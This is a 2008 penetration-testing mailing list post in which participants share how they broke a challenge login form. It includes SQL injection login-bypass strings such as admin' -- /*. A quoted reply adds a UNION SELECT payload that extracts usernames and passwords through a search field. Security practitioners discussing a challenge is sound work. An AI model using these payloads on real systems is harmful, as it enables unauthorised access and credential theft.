|
Penetration Testing
mailing list archives
Re: hacker challenge... pwn3d login form
From: "Vivek P" <iamherevivek () gmail com>
Date: Sun, 7 Sep 2008 16:04:30 +0530
Jorge,
I think misdirection was a little arbit!
Normal User access (no user creation needed / could shut down DB!!)
'--
' --/*
Admin
admin' --
admin' -- /*
Thanks
On Sun, Sep 7, 2008 at 4:25 AM, GulfTech Security Research
<security () gulftech org> wrote:
Hi Jorge,
Did you say the cookie bit to throw people off? I notice that basically the cookie is using an md5'ed version of the
username as the id, and I get that, but I actually got in by using the username "admin' -- /*" and the password "1".
Also, I have been able to exploit the search feature to get this information also by sending a query like this.
-99' UNION SELECT 1,2,username,password,5 FROM members -- /*
Kind Regards,
James
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Top 5 Common Mistakes in Securing Web Applications
Get 45 Min Video and PPT Slides
www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
--
Regards
Vivek P Nair
VP Technology
Appin Software Security Private Limited
d3 () dbr@1n - I though i would change the world, they wouldnt gimme the
source code!!
Three ways to gain Success
1. know more than others
2. work more than others
3. expect less than others
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Top 5 Common Mistakes in
Securing Web Applications
Get 45 Min Video and PPT Slides
www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
 By Date 
By Thread
Current thread:
|
Intro
